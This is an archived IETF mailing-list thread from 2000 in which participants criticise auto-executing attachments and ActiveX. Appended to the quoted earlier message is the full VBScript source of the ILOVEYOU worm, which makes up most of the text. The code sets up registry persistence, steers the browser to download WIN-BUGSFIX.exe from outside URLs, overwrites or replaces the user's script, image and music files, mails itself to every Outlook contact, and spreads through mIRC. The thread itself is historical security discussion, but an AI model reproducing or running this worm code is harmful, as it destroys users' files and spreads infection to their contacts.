ietf

RE: Security insanity

2000-05-04 13:03:47
I agree with you - anything that happens automatically, without giving
the user the chance to say "yes" or "no thank you", invites this
kind of attack. That chance to say no should be part of ActiveX or any
other technology.
Nothing should autoexecute. Unfortunately a lot of e-commerce and software
companies are guilty of peppering the Internet with "auto-updates" (see AOL),
"checks" (see Windowsupdate.com), cookies (need I say!), etc., which are all
open invitations for break-in and worse.
A strict standard is very much called for; IMO we must find the fine line
between user-friendly and vulnerable.

Lillian Komlossy                     
Site Manager                         
http://www.dmnews.com           
http://www.imarketingnews.com  
(212) 925-7300 ext. 232 


-----Original Message-----
From: Donald E. Eastlake 3rd [mailto:dee3(_at_)torque(_dot_)pothole(_dot_)com]
Sent: Thursday, May 04, 2000 1:54 PM
To: ietf(_at_)ietf(_dot_)org
Subject: Security insanity



It's not switching to UNIX, it's avoiding security insanity like
ActiveX, self-extracting binaries, automatically executing attachments
on opening mail, as apparently Outlook does, etc.  A few
seconds' thought would tell anyone with a clue what a bad idea these
are.

It is just insane that vast parts of the computing capacity of the world
can be damaged this badly and this trivially.

Donald

PS:  Appended below is the virus in a hopefully non-virulent form.

Donald,

The whole world will not switch over to Unix 
- the average user will always be more comfortable with Windows 
unless Unix at some point offers the same seamless user-friendliness. 
So it will always be a problem, one which cannot be solved by telling 
others not to use what they've become accustomed to - and one which cannot be
ignored.

Lillian Komlossy                     
Site Manager                         
http://www.dmnews.com           
http://www.imarketingnews.com  
(212) 925-7300 ext. 232 

=====================================================================
 Donald E. Eastlake 3rd                      
dee3(_at_)torque(_dot_)pothole(_dot_)com
 140 Forest Avenue                                +1 914-276-2668(h)
 Hudson, MA 01749 USA                             +1 508-261-5434(w)

q MIME-Version: 1.0
q X-Mailer: Internet Mail Service (5.5.2448.0)
q Content-Type: multipart/mixed;
q       boundary="----_=_NextPart_000_01BFB5DE.957A65A0"
q 
q This message is in MIME format. Since your mail reader does not understand
q this format, some or all of this message may not be legible.
q 
q ------_=_NextPart_000_01BFB5DE.957A65A0
q Content-Type: text/plain
q 
q 
q kindly check the attached LOVELETTER coming from me.
q 
q 
q ------_=_NextPart_000_01BFB5DE.957A65A0
q Content-Type: application/octet-stream;
q       name="LOVE-LETTER-FOR-YOU.TXT.vbs"
q Content-Transfer-Encoding: quoted-printable
q Content-Disposition: attachment;
q       filename="LOVE-LETTER-FOR-YOU.TXT.vbs"
q 
q rem  barok -loveletter(vbe) <i hate go to school>
q rem                   by: spyder  /  ispyder(_at_)mail(_dot_)com  /  
@GRAMMERSoft
Group  /  =
q Manila,Philippines
q On Error Resume Next
q dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
q eq=3D""
q ctr=3D0
q Set fso =3D CreateObject("Scripting.FileSystemObject")
q set file =3D fso.OpenTextFile(WScript.ScriptFullname,1)
q vbscopy=3Dfile.ReadAll
q main()
q sub main()
q On Error Resume Next
q dim wscr,rr
q set wscr=3DCreateObject("WScript.Shell")
q rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows =
q Scripting Host\Settings\Timeout")
q if (rr>=3D1) then
q wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting =
q Host\Settings\Timeout",0,"REG_DWORD"
q end if
q Set dirwin =3D fso.GetSpecialFolder(0)
q Set dirsystem =3D fso.GetSpecialFolder(1)
q Set dirtemp =3D fso.GetSpecialFolder(2)
q Set c =3D fso.GetFile(WScript.ScriptFullName)
q c.Copy(dirsystem&"\MSKernel32.vbs")
q c.Copy(dirwin&"\Win32DLL.vbs")
q c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
q regruns()
q html()
q spreadtoemail()
q listadriv()
q end sub
q sub regruns()
q On Error Resume Next
q Dim num,downread
q regcreate =
q "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern=
q el32",dirsystem&"\MSKernel32.vbs"
q regcreate =
q "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService=
q s\Win32DLL",dirwin&"\Win32DLL.vbs"
q downread=3D""
q downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet =
q Explorer\Download Directory")
q if (downread=3D"") then
q downread=3D"c:\"
q end if
q if (fileexist(dirsystem&"\WinFAT32.exe")=3D1) then
q Randomize
q num =3D Int((4 * Rnd) + 1)
q if num =3D 1 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm=
q hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
q elseif num =3D 2 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw=
q erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
q elseif num =3D 3 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd=
q QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
q elseif num =3D 4 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD=
q GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN=
q -BUGSFIX.exe"
q end if
q end if
q if (fileexist(downread&"\WIN-BUGSFIX.exe")=3D0) then
q regcreate =
q "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU=
q GSFIX",downread&"\WIN-BUGSFIX.exe"
q regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet =
q Explorer\Main\Start Page","about:blank"
q end if
q end sub
q sub listadriv
q On Error Resume Next
q Dim d,dc,s
q Set dc =3D fso.Drives
q For Each d in dc
q If d.DriveType =3D 2 or d.DriveType=3D3 Then
q folderlist(d.path&"\")
q end if
q Next
q listadriv =3D s
q end sub
q sub infectfiles(folderspec) =20
q On Error Resume Next
q dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
q set f =3D fso.GetFolder(folderspec)
q set fc =3D f.Files
q for each f1 in fc
q ext=3Dfso.GetExtensionName(f1.path)
q ext=3Dlcase(ext)
q s=3Dlcase(f1.name)
q if (ext=3D"vbs") or (ext=3D"vbe") then
q set ap=3Dfso.OpenTextFile(f1.path,2,true)
q ap.write vbscopy
q ap.close
q elseif(ext=3D"js") or (ext=3D"jse") or (ext=3D"css") or (ext=3D"wsh") =
q or (ext=3D"sct") or (ext=3D"hta") then
q set ap=3Dfso.OpenTextFile(f1.path,2,true)
q ap.write vbscopy
q ap.close
q bname=3Dfso.GetBaseName(f1.path)
q set cop=3Dfso.GetFile(f1.path)
q cop.copy(folderspec&"\"&bname&".vbs")
q fso.DeleteFile(f1.path)
q elseif(ext=3D"jpg") or (ext=3D"jpeg") then
q set ap=3Dfso.OpenTextFile(f1.path,2,true)
q ap.write vbscopy
q ap.close
q set cop=3Dfso.GetFile(f1.path)
q cop.copy(f1.path&".vbs")
q fso.DeleteFile(f1.path)
q elseif(ext=3D"mp3") or (ext=3D"mp2") then
q set mp3=3Dfso.CreateTextFile(f1.path&".vbs")
q mp3.write vbscopy
q mp3.close
q set att=3Dfso.GetFile(f1.path)
q att.attributes=3Datt.attributes+2
q end if
q if (eq<>folderspec) then
q if (s=3D"mirc32.exe") or (s=3D"mlink32.exe") or (s=3D"mirc.ini") or =
q (s=3D"script.ini") or (s=3D"mirc.hlp") then
q set scriptini=3Dfso.CreateTextFile(folderspec&"\script.ini")
q scriptini.WriteLine "[script]"
q scriptini.WriteLine ";mIRC Script"
q scriptini.WriteLine ";  Please dont edit this script... mIRC will =
q corrupt, if mIRC will"
q scriptini.WriteLine "     corrupt... WINDOWS will affect and will not =
q run correctly. thanks"
q scriptini.WriteLine ";"
q scriptini.WriteLine ";Khaled Mardam-Bey"
q scriptini.WriteLine ";http://www.mirc.com";
q scriptini.WriteLine ";"
q scriptini.WriteLine "n0=3Don 1:JOIN:#:{"
q scriptini.WriteLine "n1=3D  /if ( $nick =3D=3D $me ) { halt }"
q scriptini.WriteLine "n2=3D  /.dcc send $nick =
q "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
q scriptini.WriteLine "n3=3D}"
q scriptini.close
q eq=3Dfolderspec
q end if
q end if
q next =20
q end sub
q sub folderlist(folderspec) =20
q On Error Resume Next
q dim f,f1,sf
q set f =3D fso.GetFolder(folderspec) =20
q set sf =3D f.SubFolders
q for each f1 in sf
q infectfiles(f1.path)
q folderlist(f1.path)
q next =20
q end sub
q sub regcreate(regkey,regvalue)
q Set regedit =3D CreateObject("WScript.Shell")
q regedit.RegWrite regkey,regvalue
q end sub
q function regget(value)
q Set regedit =3D CreateObject("WScript.Shell")
q regget=3Dregedit.RegRead(value)
q end function
q function fileexist(filespec)
q On Error Resume Next
q dim msg
q if (fso.FileExists(filespec)) Then
q msg =3D 0
q else
q msg =3D 1
q end if
q fileexist =3D msg
q end function
q function folderexist(folderspec)
q On Error Resume Next
q dim msg
q if (fso.GetFolderExists(folderspec)) then
q msg =3D 0
q else
q msg =3D 1
q end if
q fileexist =3D msg
q end function
q sub spreadtoemail()
q On Error Resume Next
q dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
q set regedit=3DCreateObject("WScript.Shell")
q set out=3DWScript.CreateObject("Outlook.Application")
q set mapi=3Dout.GetNameSpace("MAPI")
q for ctrlists=3D1 to mapi.AddressLists.Count
q set a=3Dmapi.AddressLists(ctrlists)
q x=3D1
q regv=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
q if (regv=3D"") then
q regv=3D1
q end if
q if (int(a.AddressEntries.Count)>int(regv)) then
q for ctrentries=3D1 to a.AddressEntries.Count
q malead=3Da.AddressEntries(x)
q regad=3D""
q regad=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&male=
q ad)
q if (regad=3D"") then
q set male=3Dout.CreateItem(0)
q male.Recipients.Add(malead)
q male.Subject =3D "ILOVEYOU"
q male.Body =3D vbcrlf&"kindly check the attached LOVELETTER coming from =
q me."
q male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
q male.Send
q regedit.RegWrite =
q "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
q end if
q x=3Dx+1
q next
q regedit.RegWrite =
q "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
q else
q regedit.RegWrite =
q "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
q end if
q next
q Set out=3DNothing
q Set mapi=3DNothing
q end sub
q sub html
q On Error Resume Next
q dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
q dta1=3D"<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META =
q NAME=3D(_at_)-@Generator(_at_)-@ CONTENT=3D(_at_)-@BAROK VBS - 
LOVELETTER(_at_)-@>"&vbcrlf& =
q _
q "<META NAME=3D(_at_)-@Author(_at_)-@ CONTENT=3D(_at_)-@spyder ?-? 
ispyder(_at_)mail(_dot_)com ?-? =
q @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000(_at_)-@>"&vbcrlf& =
q _
q "<META NAME=3D(_at_)-@Description(_at_)-@ CONTENT=3D(_at_)-@simple but i 
think this is =
q good(_dot_)(_dot_)(_dot_)(_at_)-@>"&vbcrlf& _
q "<?-?HEAD><BODY =
q ONMOUSEOUT=3D(_at_)-@window.name=3D#-#main#-#;window.open(#-#LOVE-LETTER-FOR-=
q YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
q "ONKEYDOWN=3D(_at_)-@window.name=3D#-#main#-#;window.open(#-#LOVE-LETTER-FOR-=
q YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=3D(_at_)-@fixed(_at_)-@ =
q BGCOLOR=3D(_at_)-@#FF9933(_at_)-@>"&vbcrlf& _
q "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to =
q read this HTML file<BR>- Please press #-#YES#-# button to Enable =
q ActiveX<?-?p>"&vbcrlf& _
q "<?-?CENTER><MARQUEE LOOP=3D(_at_)-@infinite(_at_)-@ =
q 
BGCOLOR=3D(_at_)-@yellow(_at_)-@>----------z--------------------z----------<?-?MAR=
q QUEE> "&vbcrlf& _
q "<?-?BODY><?-?HTML>"&vbcrlf& _
q "<SCRIPT language=3D(_at_)-@JScript(_at_)-@>"&vbcrlf& _
q "<!--?-??-?"&vbcrlf& _
q "if (window.screen){var wi=3Dscreen.availWidth;var =
q hi=3Dscreen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbc=
q rlf& _
q "?-??-?-->"&vbcrlf& _
q "<?-?SCRIPT>"&vbcrlf& _
q "<SCRIPT LANGUAGE=3D(_at_)-@VBScript(_at_)-@>"&vbcrlf& _
q "<!--"&vbcrlf& _
q "on error resume next"&vbcrlf& _
q "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
q "aw=3D1"&vbcrlf& _
q "code=3D"
q dta2=3D"set =
q fso=3DCreateObject(@-(_at_)Scripting(_dot_)FileSystemObject@-@)"&vbcrlf& _
q "set dirsystem=3Dfso.GetSpecialFolder(1)"&vbcrlf& _
q "code2=3Dreplace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
q "code3=3Dreplace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
q "code4=3Dreplace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
q "set =
q 
wri=3Dfso.CreateTextFile(dirsystem&@-(_at_)^-^MSKernel32(_dot_)vbs@-@)"&vbcrlf& 
_
q "wri.write code4"&vbcrlf& _
q "wri.close"&vbcrlf& _
q "if (fso.FileExists(dirsystem&@-(_at_)^-^MSKernel32(_dot_)vbs@-@)) 
then"&vbcrlf& _
q "if (err.number=3D424) then"&vbcrlf& _
q "aw=3D0"&vbcrlf& _
q "end if"&vbcrlf& _
q "if (aw=3D1) then"&vbcrlf& _
q "document.write @-(_at_)ERROR: can#-#t initialize ActiveX(_at_)-@"&vbcrlf& _
q "window.close"&vbcrlf& _
q "end if"&vbcrlf& _
q "end if"&vbcrlf& _
q "Set regedit =3D CreateObject(@-(_at_)WScript(_dot_)Shell@-@)"&vbcrlf& _
q "regedit.RegWrite =
q @-(_at_)HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^=
q 
-^Run^-^MSKernel32(_at_)-@,dirsystem&@-(_at_)^-^MSKernel32(_dot_)vbs@-@"&vbcrlf&
 _
q "?-??-?-->"&vbcrlf& _
q "<?-?SCRIPT>"
q dt1=3Dreplace(dta1,chr(35)&chr(45)&chr(35),"'")
q dt1=3Dreplace(dt1,chr(64)&chr(45)&chr(64),"""")
q dt4=3Dreplace(dt1,chr(63)&chr(45)&chr(63),"/")
q dt5=3Dreplace(dt4,chr(94)&chr(45)&chr(94),"\")
q dt2=3Dreplace(dta2,chr(35)&chr(45)&chr(35),"'")
q dt2=3Dreplace(dt2,chr(64)&chr(45)&chr(64),"""")
q dt3=3Dreplace(dt2,chr(63)&chr(45)&chr(63),"/")
q dt6=3Dreplace(dt3,chr(94)&chr(45)&chr(94),"\")
q set fso=3DCreateObject("Scripting.FileSystemObject")
q set c=3Dfso.OpenTextFile(WScript.ScriptFullName,1)
q lines=3DSplit(c.ReadAll,vbcrlf)
q l1=3Dubound(lines)
q for n=3D0 to ubound(lines)
q lines(n)=3Dreplace(lines(n),"'",chr(91)+chr(45)+chr(91))
q lines(n)=3Dreplace(lines(n),"""",chr(93)+chr(45)+chr(93))
q lines(n)=3Dreplace(lines(n),"\",chr(37)+chr(45)+chr(37))
q if (l1=3Dn) then
q lines(n)=3Dchr(34)+lines(n)+chr(34)
q else
q lines(n)=3Dchr(34)+lines(n)+chr(34)&"&vbcrlf& _"
q end if
q next
q set b=3Dfso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
q b.close
q set d=3Dfso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
q d.write dt5
q d.write join(lines,vbcrlf)
q d.write vbcrlf
q d.write dt6
q d.close
q end sub
q ------_=_NextPart_000_01BFB5DE.957A65A0--



  • Security insanity, Donald E. Eastlake 3rd
    • RE: Security insanity, Lillian Komlossy <=